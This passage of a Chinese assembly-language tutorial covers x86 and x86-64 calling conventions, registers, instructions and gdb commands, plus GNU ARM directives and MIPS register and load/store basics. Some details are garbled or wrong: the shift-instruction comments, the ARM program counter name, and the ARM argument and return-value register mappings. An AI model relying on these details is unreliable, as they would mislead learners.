
这是一个遵循被调用者约定的例子 :

;启动代码部分
.text

;将 myFunc 定义为全局 ( 导出 ) 函数
.globl myFunc
.type myFunc, @function
myFunc :
;子程序序言
push %ebp ;保存基指针旧值
mov %esp, %ebp ;设置基指针新值
sub $4, %esp ;为一个 4 字节的变量腾出位置
push %edi
push %esi ;这个函数会修改 EDI 和 ESI, 所以先给它们入栈
;不需要保存 EBX, EBP 和 ESP

;子程序主体
mov 8(%ebp), %eax ;把参数 1 的值移到 EAX 中
mov 12(%ebp), %esi ;把参数 2 的值移到 ESI 中
mov 16(%ebp), %edi ;把参数 3 的值移到 EDI 中

mov %edi, -4(%ebp) ;把 EDI 移给局部变量
add %esi, -4(%ebp) ;把 ESI 添加给局部变量
add -4(%ebp), %eax ;将局部变量的内容添加到 EAX ( 最终结果 ) 中

;子程序结尾
pop %esi ;恢复寄存器的值
pop %edi
mov %ebp, %esp ;释放局部变量
pop %ebp ;恢复调用者的基指针值
ret

子程序序言执行标准操作, 即在 EBP ( 基指针 ) 中保存栈指针的副本, 通过递减栈指针来分配局部变量, 并在栈上保存寄存器的值.

在子例程的主体中, 我们可以看到基指针的使用. 在子程序执行期间, 参数和局部变量都位于与基指针的常量偏移处. 特别地, 我们注意到, 由于参数在调用子程序之前被放在栈中, 因此它们总是位于栈基指针 ( 即更高的地址 ) 之下. 子程序的第一个参数总是可以在内存地址 ( EBP+8 ) 找到, 第二个参数在 ( EBP+12 ), 第三个参数在 ( EBP+16). 类似地, 由于在设置基指针后分配局部变量, 因此它们总是位于栈上基指针 ( 即较低地址 ) 之上. 特别是, 第一个局部变量总是位于 ( EBP-4 ), 第二个位于 ( EBP-8 ), 以此类推. 这种基指针的常规使用, 让我们可以快速识别函数内部局部变量和参数的使用.

函数结尾基本上是函数序言的镜像. 从栈中恢复调用者的寄存器值, 通过重置栈指针来释放局部变量, 恢复调用者的基指针值, 并用 ret 指令返回调用者中的相应代码位置, 从哪来回哪去.

维基百科 X86 调用约定

3.4 x64 汇编基础

3.4.1 导语

x86-64 (也被称为 x64 或者 AMD64) 是 64 位版本的 x86/IA32 指令集. 以下是我们关于 CS107 相关功能的概述.

3.4.2 寄存器 Registers

下图列出了常用的寄存器 ( 16个通用寄存器加上 2 个特殊用途寄存器 ). 每个寄存器都是 64 bit 宽, 它们的低 32, 16, 8 位都可以看成相应的 32, 16, 8 位寄存器, 并且都有其特殊名称. 一些寄存器被设计用来完成某些特殊目的, 比如 %rsp 被用来作为栈指针, %rax 作为一个函数的返回值. 其他寄存器则都是通用的, 但是一般在使用的时候, 还是要取决于调用者 ( Caller-owned )或者被调用者 ( Callee-owned ). 如果函数 binky 调用了 winky, 我们称 binky 为调用者, winky 为被调用者. 例如, 用于前 6 个参数和返回值的寄存器都是被调用者所有的 ( Callee-owned ). 被调用者可以任意使用这些寄存器, 不用任何预防措施就可以随意覆盖里面的内容. 如果 %rax 存着调用者想要保留的值, 则 Caller 必须在调用之前将这个 %rax 的值复制到一个 " 安全 " 的位置. 被调用者拥有的 ( Callee-owned ) 寄存器非常适合一些临时性的使用. 相反, 如果被调用者打算使用调用者所拥有的寄存器, 那么被调用者必须首先把这个寄存器的值存起来, 然后在退出调用之前把它恢复. 调用者拥有的 ( Caller-owned ) 寄存器用于保存调用者的本地状态 ( local state ), 所以这个寄存器需要在进一步的函数调用中被保留下来.

3.4.3 寻址模式 Addressing modes

正由于它的 CISC 特性, X86-64 支持各种寻址模式. 寻址模式是计算要读或写的内存地址的表达式. 这些表达式用作mov指令和访问内存的其它指令的来源和去路. 下面的代码演示了如何在每个可用的寻址模式中将立即数 1 写入各种内存位置 :

movl $1, 0x604892         ;直接写入, 内存地址是一个常数
movl $1, (%rax)           ;间接写入, 内存地址存在寄存器 %rax 中

movl $1, -24(%rbp)       ;使用偏移量的间接写入
                         ;公式 : (address = base %rbp + displacement -24)

movl $1, 8(%rsp, %rdi, 4) ;间接写入, 用到了偏移量和按比例放大的索引 ( scaled-index )
           ;公式 : (address = base %rsp + displ 8 + index %rdi * scale 4)

movl $1, (%rax, %rcx, 8) ;特殊情况, 用到了按比例放大的索引 ( scaled-index ), 假设偏移量 ( displacement ) 为 0

movl $1, 0x8(, %rdx, 4)  ;特殊情况, 用到了按比例放大的索引 ( scaled-index ), 假设基数 ( base ) 为 0
movl $1, 0x4(%rax, %rcx) ;特殊情况, 用到了按比例放大的索引 ( scaled-index ), 假设比例 ( scale ) 为0

3.4.4 通用指令 Common instructions

先说下指令后缀, 之前讲过这里就重温一遍 : 许多指令都有个后缀 ( b, w, l, q ) , 后缀指明了这个指令代码所操纵参数数据的位宽 ( 分别为 1, 2, 4 或 8 个字节 ). 当然, 如果可以从参数确定位宽的时候, 后缀可以被省略. 例如呢, 如果目标寄存器是 %eax, 则它必须是 4 字节宽, 如果是 %ax 寄存器, 则必须是 2 个字节, 而 %al 将是 1 个字节. 还有些指令, 比如 movs 和 movz 有两个后缀 : 第一个是来源参数, 第二个是去路. 这话乍一看让人摸不着头脑, 且听我分析. 例如, movzbl 这个指令把 1 个字节的来源参数值移动到 4 个字节的去路.

当目标是子寄存器 ( sub-registers ) 时, 只有子寄存器的特定字节被写入, 但有一个例外 : 32 位指令将目标寄存器的高 32 位设置为 0.

`mov` 和 `lea` 指令

到目前为止, 我们遇到的最频繁的指令就是 mov, 而它有很多变种. 关于 mov 指令就不多说了, 和之前 32 位 x86 的没什么区别. lea 指令其实也没什么好说的, 上一节都有, 这里就不废话了.

这里写几个比较有意思的例子 :
mov 8(%rsp), %eax    ;%eax = 从地址 %rsp + 8 读取的值
lea 0x20(%rsp), %rdi ;%rdi = %rsp + 0x20
lea (%rdi,%rdx,1), %rax  ;%rax = %rdi + %rdx

在把较小位宽的数据移动复制到较大位宽的情况下, movs 和 movz 这两个变种指令用于指定怎么样去填充字节, 因为你是一个小东西被移到了一个大空间, 肯定还有地方是空的, 所以空的地方要填起来, 拿 0 或者符号扩展 ( sign-extend ) 来填充.

movsbl %al, %edx     ;把 1 个字节的 %al, 符号扩展 复制到 4 字节的 %edx
movzbl %al, %edx     ;把 1 个字节的 %al, 零扩展 ( zero-extend ) 复制到 4 字节的 %edx

有个特殊情况要注意, 默认情况下, 将 32 位值写入寄存器的 mov 指令, 也会将寄存器的高 32 位归零, 即隐式零扩展到位宽 q. 这个解释了诸如 mov %ebx, %ebx 这种指令, 这些指令看起来很奇怪, 但实际上这是用于从 32 位扩展到 64 位. 因为这个是默认的, 所以我们不用显式的 movzlq 指令. 当然, 有一个 movslq 指令也是从 32 位符号扩展到 64 位.

cltq 指令是一个在 %rax 上运行的专用移动指令. 这个没有参数的指令在 %rax 上进行符号扩展, 源位宽为 L, 目标位宽为 q.

cltq   ;在 ％rax 上运行，将 4 字节 src 符号扩展为 8 字节 dst，用于 movslq ％eax，％rax

算术和位运算

二进制的运算一般是两个参数, 其中第二个参数既是我们指令运算的来源, 也是去路的来源, 就是说我们把运算结果存在第二个参数里. 我们的第一个参数可以是立即数常数, 寄存器或者内存单元. 第二个参数必须是寄存器或者内存. 这两个参数中, 最多只有一个参数是内存单元, 当然也有的指令只有一个参数, 这个参数既是我们运算数据的来源, 也是我们运算数据的去路, 它可以是寄存器或者内存. 这个我们上一节讲了, 这里回顾一下. 许多算术指令用于有符号和无符号类型,也就是带符号加法和无符号加法都使用相同的指令. 当需要的时候, 参数设置的条件代码可以用来检测不同类型的溢出.

add src, dst ;dst = dst + src
sub src, dst ;dst = dst - src
imul src, dst ;dst = dst * src
neg dst ;dst = -dst ( 算术取反 )

and src, dst ;dst = dst & src
or src, dst ;dst = dst | src
xor src, dst ;dst = dst ^ src
not dst ;dst = ~dst ( 按位取反 )

shl count, dst ;dst <<= count ( 按 count 的值来左移 ), 跟这个相同的是`sal`指令
sar count, dst ;dst = count ( 按 count 的值来算术右移 )
shr count, dst ;dst = count ( 按 count 的值来逻辑右移 )

;某些指令有特殊情况变体, 这些变体有不同的参数
imul src ;一个参数的 imul 指令假定 %rax 中其他参数计算 128 位的结果, 在 %rdx 中存储高 64 位, 在 %rax 中存储低 64 位.
shl dst ;dst <<= 1 ( 后面没有 count 参数的时候默认是移动 1 位, `sar`, `shr`, `sal` 指令也是一样 )

这些指令上一节都讲过, 这里稍微提一下.

流程控制指令

有一个特殊的 %eflags 寄存器, 它存着一组被称为条件代码的布尔标志. 大多数的算术运算会更新这些条件代码. 条件跳转指令读取这些条件代码之后, 再确定是否执行相应的分支指令. 条件代码包括 ZF( 零标志 ), SF( 符号标志 ), OF( 溢出标志, 有符号 ) 和 CF( 进位标志, 无符号 ). 例如, 如果结果为 0 , 则设置 ZF, 如果操作溢出 ( 进入符号位 ), 则设置 OF.

这些指令一般是先执行 cmp 或 test 操作来设置标志, 然后再跟跳转指令变量, 该变量读取标志来确定是采用分支代码还是继续下一条代码. cmp 或 test 的参数是立即数, 寄存器或者内存单元 ( 最多只有一个内存参数 ). 条件跳转有 32 中变体, 其中几种效果是一样的. 下面是一些分支指令.

cmpl op2, op1 ;运算结果 = op1 - op2, 丢弃结果然后设置条件代码
test op2, op1 ;运算结果 = op1 & op2, 丢弃结果然后设置条件代码

jmp target ;无条件跳跃
je target ;等于时跳跃, 和它相同的还有 jz, 即jump zero ( ZF = 1 )
jne target ;不相等时跳跃, 和它相同的还有 jnz, 即 jump non zero ( ZF = 0 )
jl target ;小于时跳跃, 和它相同的还有 jnge, 即 jump not greater or equal ( SF != OF )  
jle target ;小于等于时跳跃, 和它相同的还有 jng, 即 jump not greater ( ZF = 1 or SF != OF )
jg target ;大于时跳跃, 和它相同的还有 jnle, 即 jump not less or equal ( ZF = 0 and SF = OF )
jge target ;大于等于时跳跃, 和它相同的还有 jnl, 即 jump not less ( SF = OF )
ja  target ;跳到上面, 和它相同的还有 jnbe, 即 jump not below or equal ( CF = 0 and ZF = 0 )
jb  target ;跳到下面, 和它相同的还有 jnae, 即 jump not above or equal ( CF = 1 )
js  target ;SF = 1 时跳跃
jns target ;SF = 0 时跳跃

其实你也会发现这里大部分上一节都讲过, 这里我们可以再来一遍巩固一下.

`setx`和`movx`

还有两个指令家族可以读取/响应当前的条件代码. setx 指令根据条件 x 的状态将目标寄存器设置为 0 或 1. cmovx 指令根据条件 x 是否成立来有条件地执行 mov. x 是任何条件变量的占位符, 就是说 x 可以用这些来代替 : e, ne, s, ns. 它们的意思上面也都说过了.

sete dst ;根据 零/相等( zero/equal ) 条件来把 dst 设置成 0 或 1
setge dst ;根据 大于/相等( greater/equal ) 条件来把 dst 设置成 0 或 1
cmovns src, dst ;如果 ns 条件成立, 则继续执行 mov
cmovle src, dst ;如果 le 条件成立, 则继续执行 mov

对于 setx 指令, 其目标必须是单字节寄存器 ( 例如 %al 用于 %rax 的低字节 ). 对于 cmovx 指令, 其来源和去路都必须是寄存器.

函数调用与栈

%rsp 寄存器用作 " 栈指针 "; push 和 pop 用于添加或者删除栈内存中的值. push 指令只有一个参数, 这个参数是立即数常数, 寄存器或内存单元. push 指令先把 %rsp 的值递减, 然后将参数复制到栈内存上的 tompost. pop 指令也只有一个参数, 即目标寄存器. pop 先把栈内存最顶层的值复制到目标寄存器, 然后把 %rsp 递增. 直接调整 %rsp, 以通过单个参数添加或删除整个数组或变量集合也是可以的. 但注意, 栈内存是朝下增长 ( 即朝向较低地址 ).

push %rbx ;把 %rbx 入栈
pushq $0x3 ;把立即数 3 入栈
sub $0x10, %rsp ;调整栈指针以空出 16 字节

pop %rax ;把栈中最顶层的值出栈到寄存器 %rax 中
add $0x10, %rsp ;调整栈指针以删除最顶层的 16 个字节

函数之间是通过互相调用返回来互相控制的. callq 指令有一个参数, 即被调用的函数的地址. 它将返回来的地址入栈, 这个返回来的地址即 %rip 当前的值, 也即是调用函数后的下一条指令. 然后这个指令让程序跳转到被调用的函数的地址. retq 指令把刚才入栈的地址给出栈, 让它回到 %rip 中, 从而让程序在保存的返回地址处重新开始, 就是说你中途跳到别的地方去, 你回来的时候要从你跳的那个地方重新开始.

当然, 你如果要设置这种函数间的互相调用, 调用者需要将前六个参数放入寄存器 %rdi, %rsi, %rdx, %rcx, %r8 和 %r9 ( 任何其它参数都入栈 ), 然后再执行调用指令.

mov $0x3, %rdi ;第一个参数在 %rdi 中
mov $0x7, %rsi ;第二个参数在 %rsi 中
callq binky ;把程序交给 binky 控制

当被调用者那个函数完事的时候, 这个函数将返回值 ( 如果有的话 ) 写入 %rax, 然后清理栈内存, 并使用 retq 指令把程序控制权交还给调用者.

mov $0x0, %eax ;将返回值写入 %rax
add $0x10, %rsp ;清理栈内存
retq ;交还控制权, 跳回去

这些分支跳转指令的目标通常是在编译时确定的绝对地址. 但是, 有些情况下直到运行程序的时候, 我们才知道目标的绝对内存地址. 例如编译为跳转表的 switch 语句或调用函数指针时. 对于这些, 我们先计算目标地址, 然后把地址存到寄存器中, 然后用分支/调用( branch/call ) 变量 je *%rax 或 callq *%rax 从指定寄存器中读取目标地址.

当然还有更简单的方法, 就是上一节讲的打标签.

3.4.5 汇编和 gdb

调试器 ( debugger ) 有许多功能, 这可以让你可以在程序中追踪和调试代码. 你可以通过在其名称上加个 $ 来打印寄存器中的值, 或者使用命令 info reg 转储所有寄存器的值 :

(gdb) p $rsp
(gdb) info reg

disassemble 命令按照名称打印函数的反汇编. x 命令支持 i 格式, 这个格式把内存地址的内容解释为编码指令 ( 解码 ).

(gdb) disassemble main //反汇编, 然后打印所有 main 函数的指令
(gdb) x/8i main //反汇编, 然后打印开始的 8 条指令

你可以通过在函数中的直接地址或偏移量为特定汇编指令设置断点.

(gdb) b *0x08048375
(gdb) b *main+7 //在 main+7个字节这里设置断点

你可以用 stepi 和 nexti 命令来让程序通过指令 ( 而不是源代码 ) 往前执行.

(gdb) stepi
(gdb) nexti

3.5 ARM汇编基础

3.5.1 引言

本章所讲述的是在 GNU 汇编程序下的 ARM 汇编快速指南，而所有的代码示例都会采用下面的结构：

[< 标签 label :]  {<指令 instruction or directive } @ 注释 comment

在 GNU 程序中不需要缩进指令。程序的标签是由冒号识别而与所处的位置无关。就通过一个简单的程序来介绍：

.section .text, "x"
.global   add @给符号添加外部链接
add:
       ADD    r0, r0, r1    @添加输入参数
      MOV    pc, lr         @从子程序返回
                            @程序结束

它定义的是一个返回总和函数 “ add ”，允许两个输入参数。通过了解这个程序实例，想必接下来这类程序的理解我们也能够很好的的掌握。

3.5.2 ARM 的 GNU 汇编程序指令表

在 GNU 汇编程序下的 ARM 指令集涵括如下：

GUN 汇编程序指令	描述
`.ascii "<string>"`	将字符串作为数据插入到程序中
`.asciz "<string>"`	与 .ascii 类似，但跟随字符串的零字节
`.balign <power_of_2> {,<fill_value>{,<max_padding>} }`	将地址与 `<power_of_2>` 字节对齐。汇编程序通过添加值 `<fill_value>` 的字节或合适的默认值来对齐. 如果需要超过 `<max_padding>` 这个数字来填充字节，则不会发生对齐（类似于armasm 中的 ALIGN ）
`.byte <byte1> {,<byte2> } …`	将一个字节值列表作为数据插入到程序中
`.code <number_of_bits>`	以位为单位设置指令宽度。使用 16 表示 Thumb，32 表示 ARM 程序（类似于 armasm 中的 CODE16 和 CODE32 ）
`.else`	与.if和 .endif 一起使用（类似于 armasm 中的 ELSE ）
`.end`	标记程序文件的结尾（通常省略）
`.endif`	结束条件编译代码块 - 参见.if，.ifdef，.ifndef（类似于 armasm 中的 ENDIF ）
`.endm`	结束宏定义 - 请参阅 .macro（类似于 armasm 中的 MEND ）
`.endr`	结束重复循环 - 参见 .rept 和 .irp（类似于 armasm 中的 WEND ）
`.equ <symbol name>, <vallue>`	该指令设置符号的值（类似于 armasm 中的 EQU ）
`.err`	这个会导致程序停止并出现错误
`.exitm`	中途退出一个宏 - 参见 .macro（类似于 armasm 中的 MEXIT ）
`.global <symbol>`	该指令给出符号外部链接（类似于 armasm 中的 MEXIT ）。
`.hword <short1> {,<short2> }...`	将16位值列表作为数据插入到程序中（类似于 armasm 中的 DCW ）
`.if <logical_expression>`	把一段代码变成前提条件。使用 .endif 结束代码块（类似于 armasm中的 IF ）。另见 .else
`.ifdef <symbol>`	如果定义了 `<symbol>`，则包含一段代码。结束代码块用 .endif, 这就是个条件判断嘛, 很简单的.
`.ifndef <symbol>`	如果未定义 `<symbol>`，则包含一段代码。结束代码块用 .endif, 同上.
`.include "<filename>"`	包括指定的源文件, 类似于 armasm 中的 INCLUDE 或 C 中的#include
`.irp <param> {,<val 1>} {,<val_2>} ...`	为值列表中的每个值重复一次代码块。使用 .endr 指令标记块的结尾。在里面重复代码块，使用 `\<param>` 替换关联的代码块值列表中的值。
`.macro <name> {<arg_1>} {,< arg_2>} ... {,<arg_N>}`	使用 N 个参数定义名为`<name>`的汇编程序宏。宏定义必须以 `.endm` 结尾。要在较早的时候从宏中逃脱，请使用 `.exitm`。这些指令是类似于 armasm 中的 MACRO，MEND 和MEXIT。你必须在虚拟宏参数前面加 `\`.
`.rept <number_of_times>`	重复给定次数的代码块。以`.endr`结束。
`<register_name> .req <register_name>`	该指令命名一个寄存器。它与 armasm 中的 `RN` 指令类似，不同之处在于您必须在右侧提供名称而不是数字（例如，`acc .req r0`）
`.section <section_name> {,"<flags> "}`	启动新的代码或数据部分。 GNU 中有这些部分:`.text`代码部分;`.data`初始化数据部分和`.bss`未初始化数据部分。这些部分有默认值flags和链接器理解默认名称（与armasm指令AREA类似的指令）。以下是 ELF 格式文件允许的 .section标志： a 表示 allowable section w 表示 writable section x 表示 executable section
`.set <variable_name>, <variable_value>`	该指令设置变量的值。它类似于 SETA。
`.space <number_of_bytes> {,<fill_byte> }`	保留给定的字节数。如果指定了字节，则填充零或 `<fill_byte>`（类似于 armasm 中的 SPACE）
`.word <word1> {,<word2>}...`	将 32 位字值列表作为数据插入到程序集中（类似于 armasm 中的 DCD）。

3.5.3 寄存器名称

通用寄存器：

%r0 - %r15

fp 寄存器：

%f0 - %f7

临时寄存器：

%r0 - %r3, %r12

保存寄存器：

%r4 - %r10

堆栈 ptr 寄存器：

%sp

帧 ptr 寄存器：

%fp

链接寄存器：

%lr

程序计数器：

%ip

状态寄存器：

$psw

状态标志寄存器：

xPSR

xPSR_all

xPSR_f

xPSR_x

xPSR_ctl

xPSR_fs

xPSR_fx

xPSR_fc

xPSR_cs

xPSR_cf

xPSR_cx

3.5.4 汇编程序特殊字符/语法

内联评论字符： '@'

行评论字符： '＃'

语句分隔符： ';'

立即操作数前缀： '＃' 或 '$'

3.5.5 arm程序调用标准

参数寄存器：％a0 - ％a4（别名为％r0 - ％r4）

返回值regs ：％v1 - ％v6（别名为％r4 - ％r9）

3.5.6 寻址模式

addr 绝对寻址模式

％rn 寄存器直接寻址

[％rn] 寄存器间接寻址或索引

[％rn，＃n] 基于寄存器的偏移量

上述 "rn" 指任意寄存器，但不包括控制寄存器。

3.5.7 机器相关指令

指令	描述
.arm	使用arm模式进行装配
.thumb	使用thumb模式进行装配
.code16	使用thumb模式进行装配
.code32	使用arm模式进行组装
.force_thumb Force	thumb模式（即使不支持）
.thumb_func	将输入点标记为thumb编码（强制bx条目）
.ltorg	启动一个新的文字池

3.6 MIPS汇编基础

数据类型和常量

数据类型：
- 指令全是32位
- 字节（8位），半字（2字节），字（4字节）
- 一个字符需要1个字节的存储空间
- 整数需要1个字（4个字节）的存储空间
常量：
- 按原样输入的数字。例如 4
- 用单引号括起来的字符。例如 'b'
- 用双引号括起来的字符串。例如 “A string”

寄存器

32个通用寄存器
寄存器前面有 $

两种格式用于寻址：

使用寄存器号码，例如 $ 0 到 $ 31
使用别名，例如 $ t1，$ sp
特殊寄存器 Lo 和 Hi 用于存储乘法和除法的结果
- 不能直接寻址; 使用特殊指令 mfhi（ “ 从 Hi 移动 ” ）和 mflo（ “ 从 Lo 移动 ” ）访问的内容
栈从高到低增长

寄存器	别名	用途
`$0`	`$zero`	常量0(constant value 0)
`$1`	`$at`	保留给汇编器(Reserved for assembler)
`$2-$3`	`$v0-$v1`	函数调用返回值(values for results and expression evaluation)
`$4-$7`	`$a0-$a3`	函数调用参数(arguments)
`$8-$15`	`$t0-$t7`	暂时的(或随便用的)
`$16-$23`	`$s0-$s7`	保存的(或如果用，需要SAVE/RESTORE的)(saved)
`$24-$25`	`$t8-$t9`	暂时的(或随便用的)
`$26~$27`	`$k0~$k1`	保留供中断/陷阱处理程序使用
`$28`	`$gp`	全局指针(Global Pointer)
`$29`	`$sp`	堆栈指针(Stack Pointer)
`$30`	`$fp`	帧指针(Frame Pointer)
`$31`	`$ra`	返回地址(return address)

再来说一说这些寄存器 :

zero 它一般作为源寄存器，读它永远返回 0，也可以将它作为目的寄存器写数据，但效果等于白写。为什么单独拉一个寄存器出来返回一个数字呢？答案是为了效率，MIPS 的设计者只允许在寄存器内执行算术操作，而不允许直接操作立即数。所以对最常用的数字 0 单独留了一个寄存器，以提高效率
at 该寄存器为给编译器保留，用于处理在加载 16 位以上的大常数时使用，编译器或汇编程序需要把大常数拆开，然后重新组合到寄存器里。系统程序员也可以显式的使用这个寄存器，有一个汇编 directive 可被用来禁止汇编器在 directive 之后再使用 at 寄存器。
v0, v1.这两个很简单，用做函数的返回值，大部分时候，使用 v0 就够了。如果返回值的大小超过 8 字节，那就需要分配使用堆栈，调用者在堆栈里分配一个匿名的结构，设置一个指向该参数的指针，返回时 v0 指向这个对应的结构，这些都是由编译器自动完成。
a0-a3. 用来传递函数入参给子函数。看一下这个例子： ret = strncmp("bear","bearer",4) 参数少于 16 字节，可以放入寄存器中，在 strncmp 的函数里，a0 存放的是 "bear" 这个字符串所在的只读区地址，a1 是 "bearer" 的地址，a2 是 4.
t0-t9 临时寄存器 s0-s8 保留寄存器这两种寄存器需要放在一起说，它们是 mips 汇编里面代码里见到的最多的两种寄存器，它们的作用都是存取数据，做计算、移位、比较、加载、存储等等，区别在于，t0-t9 在子程序中可以使用其中的值，并不必存储它们，它们很适合用来存放计算表达式时使用的“临时”变量。如果这些变量的使用要要跳转到子函数之前完成，因为子函数里很可能会使用相同的寄存器，而且不会有任何保护。如果子程序里不会调用其它函数那么建议尽量多的使用t0-t9，这样可以避免函数入口处的保存和结束时的恢复。相反的，s0-s8 在子程序的执行过程中，需要将它们存储在堆栈里，并在子程序结束前恢复。从而在调用函数看来这些寄存器的值没有变化。
k0, k1. 这两个寄存器是专门预留给异常处理流程中使用。异常处理流程中有什么特别的地方吗？当然。当 MIPS CPU 在任务里运行的时候，一旦有外部中断或者异常发生，CPU 就会立刻跳转到一个固定地址的异常 handler 函数执行，并同时将异常结束后返回到任务的指令地址记录在 EPC 寄存器（Exception Program Counter）里。习惯性的，异常 handler 函数开头总是会保持现场即 MIPS 寄存器到中断栈空间里，而在异常返回前，再把这些寄存器的值恢复回去。那就存在一个问题，这个 EPC 里的值存放在哪里？异常 handler 函数的最后肯定是一句 jr x，X 是一个 MIPS 寄存器，如果存放在前面提到的 t0,s0 等等，那么 PC 跳回任务执行现场时，这个寄存器里的值就不再是异常发生之前的值。所以必须要有时就可以一句 jr k0指令返回了。 k1 是另外一个专为异常而生的寄存器，它可以用来记录中断嵌套的深度。CPU 在执行任务空间的代码时，k1 就可以置为 0，进入到中断空间，每进入一次就加 1，退出一次相应减 1，这样就可以记录中断嵌套的深度。这个深度在调试问题的时候经常会用到，同时应用程序在做一次事情的时候可能会需要知道当前是在任务还是中断上下文，这时，也可以通过 k1 寄存器是否为 0 来判断。
sp 指向当前正在操作的堆栈顶部，它指向堆栈中的下一个可写入的单元，如果从栈顶获取一个字节是 sp-1 地址的内容。在有 RTOS 的系统里，每个 task 都有自己的一个堆栈空间和实时 sp 副本，中断也有自己的堆栈空间和 sp 副本，它们会在上下文切换的过程中进行保存和恢复。
gp 这是一个辅助型的寄存器，其含义较为模糊，MIPS 官方为该寄存器提供了两个用法建议，一种是指向 Linux 应用中位置无关代码之外的数据引用的全局偏移量表；在运行 RTOS 的小型嵌入式系统中，它可以指向一块访问较为频繁的全局数据区域，由于MIPS 汇编指令长度都是 32bit，指令内部的 offset 为 16bit，且为有符号数，所以能用一条指令以 gp 为基地址访问正负 15bit 的地址空间，提高效率。那么编译器怎么知道gp初始化的值呢？只要在 link 文件中添加 _gp 符号，连接器就会认为这是 gp 的值。我们在上电时，将 _gp 的值赋给 gp 寄存器就行了。话说回来，这都是 MIPS 设计者的建议，不是强制，楼主还见过一种 gp 寄存器的用法，来在中断和任务切换时做 sp 的存储过渡，也是可以的。
fp 这个寄存器不同的编译器对其解释不同，GNU MIPS C 编译器使用其作为帧指针，指向堆栈里的过程帧（一个子函数）的第一个字，子函数可以用其做一个偏移访问栈帧里的局部变量，sp 也可以较为灵活的移动，因为在函数退出之前使用 fp 来恢复；还要一种而 SGI 的 C 编译器会将这个寄存器直接作为 s8,扩展了一个保留寄存器给编译器使用。
ra 在函数调用过程中，保持子函数返回后的指令地址。汇编语句里函数调用的形式为： jal function_X 这条指令 jal(jump-and-link,跳转并链接) 指令会将当期执行运行指令的地址 +4 存储到 ra 寄存器里，然后跳转到 function_X 的地址处。相应的，子函数返回时，最常见的一条指令就是 jr ra ra 是一个对于调试很有用的寄存器，系统的运行的任何时刻都可以查看它的值以获取 CPU 的运行轨迹。

最后，如果纯写汇编语句的话，这些寄存器当中除了 zero 之外，其它的基本上都可以做普通寄存器存取数据使用（这也是它们为什么会定义为“通用寄存器”，而不像其它的协处理器、或者外设的都是专用寄存器，其在出厂时所有的功能都是定死的），那为什么有这么多规则呢？MIPS 开发者们为了让自己的处理器可以运行像 C、Java 这样的高级语言，以及让汇编语言和高级语言可以安全的混合编程而设计的一套 ABI（应用编程接口），不同的编译器的设计者们就会有据可依，系统程序员们在阅读、修改汇编程序的时候也能根据这些约定而更为顺畅地理解汇编代码的含义。

程序结构

本质上只是带有数据声明的纯文本文件，程序代码 ( 文件名应以后缀 .s 结尾，或者.asm )
数据声明部分后跟程序代码部分

数据声明

数据以 .data 为标识
声明变量后，即在内存中分配空间

代码

放在用汇编指令 .text 标识的文本部分中
包含程序代码（指令）
给定标签 main 代码执行的起点 ( 和 C 语言一样 )
程序结束标志（见下面的系统调用）

注释

＃表示单行注释

＃后面的任何内容都会被视为注释

MIPS 汇编语言程序的模板：

＃给出程序名称和功能描述的注释
＃Template.s
#MIPS汇编语言程序的Bare-bones概述

            .data #变量声明遵循这一行
                        ＃...
            .text＃指令跟随这一行

 main：＃表示代码的开始（执行的第一条指令）
                        ＃...

＃程序结束，之后留空，让SPIM满意.

变量声明

声明格式：

name：storage_type value（s）

使用给定名称和指定值为指定类型的变量创建空间

value (s) 通常给出初始值; 对于.space，给出要分配的空格数

注意：标签后面跟冒号（:)

例如

var1：.word 3 ＃创建一个初始值为 3 的整数变量
array1：.byte'a'，'b' ＃创建一个元素初始化的 2 元素字符数组到 a 和 b

array2：.space 40  #分配 40 个连续字节, 未初始化的空间可以用作 40 个元素的字符数组, 或者是
                                   #10 个元素的整数数组.

读取/写入 ( Load/Store )指令

对 RAM 的访问, 仅允许使用加载和存储指令 ( 即 load 或者 store)
所有其他指令都使用寄存器参数

load：

lw register_destination，RAM_source
#将源内存地址的字 ( 4 个字节 ) 复制到目标寄存器,（lw中的'w'意为'word',即该数据大小为4个字节）
lb register_destination，RAM_source
#将源内存地址的字节复制到目标寄存器的低位字节, 并将符号映射到高位字节 ( 同上, lb 意为 load byte )

store：

sw register_source，RAM_destination
#将源寄存器的字存储到目标内存RAM中
sb register_source，RAM_destination
#将源寄存器中的低位字节存储到目标内存RAM中

立即加载：

li register_destination，value
#把立即值加载到目标寄存器中,顾名思义, 这里的 li 意为 load immediate, 即立即加载.

例子

       .data
var1:  .word  23            # 给变量 var1 在内存中开辟空间, 变量初始值为 23

       .text
__start:
       lw     $t0, var1            # 将内存单元中的内容加载到寄存器中 $t0:  $t0 = var1
       li     $t1, 5               #  $t1 = 5   ("立即加载")
       sw     $t1, var1            # 把寄存器$t1的内容存到内存中 : var1 = $t1
       done

间接和立即寻址

仅用于读取和写入指令

*直接给地址：*

       la $t0，var1

将 var1 的内存地址（可能是程序中定义的标签）复制到寄存器 $t0 中

*间接寻址, 地址是寄存器的内容, 类似指针：*

       lw $t2，（$t0）

将 $t0 中包含的 RAM 地址加载到 $t2

       sw $t2，（$t0）

将 $t2 寄存器中的字存储到 $t0 中包含的地址的 RAM 中

*基于偏移量的寻址：*

       lw $t2, 4（$t0）

将内存地址 ( $t0 + 4 ) 的字加载到寄存器 $t2 中
“ 4 ” 给出了寄存器 $t0 中地址的偏移量

       sw $t2，-12（$t0）

将寄存器 $t2 中的字放到内存地址（ $t0 - 12 ）
负偏移也是可以的, 反向漂移方不方 ?

注意：基于偏移量 的寻址特别适用于：
数组; 访问元素作为与基址的偏移量
栈; 易于访问偏离栈指针或帧指针的元素
例子

 .data
 array1:             .space 12            #  定义一个 12字节 长度的数组 array1, 容纳 3个整型
              .text
 __start:     la     $t0, array1          #  让 $t0 = 数组首地址
              li     $t1, 5               #  $t1 = 5   ("load immediate")
              sw $t1, ($t0)               #  数组第一个元素设置为 5; 用的间接寻址; array[0] = $1 = 5
              li $t1, 13                  #   $t1 = 13
              sw $t1, 4($t0)              # 数组第二个元素设置为 13; array[1] = $1 = 13
              #该数组中每个元素地址相距长度就是自身数据类型长度，即4字节， 所以对于array+4就是array[1]
              li $t1, -7                  #   $t1 = -7
              sw $t1, 8($t0)              #  第三个元素设置为 -7;  
#array+8 = （address[array[0])+4）+ 4 = address(array[1]) + 4 = address(array[2])
              done

算术指令

最多使用3个参数
所有操作数都是寄存器; 不能有内存地址的存在
操作数大小是字 ( 4个字节 ), 32位 = 4 * 8 bit = 4bytes = 1 word

add    $t0,$t1,$t2   #  $t0 = $t1 + $t2;添加为带符号（2 的补码）整数
sub    $t2,$t3,$t4   #  $t2 = $t3 Ð $t4
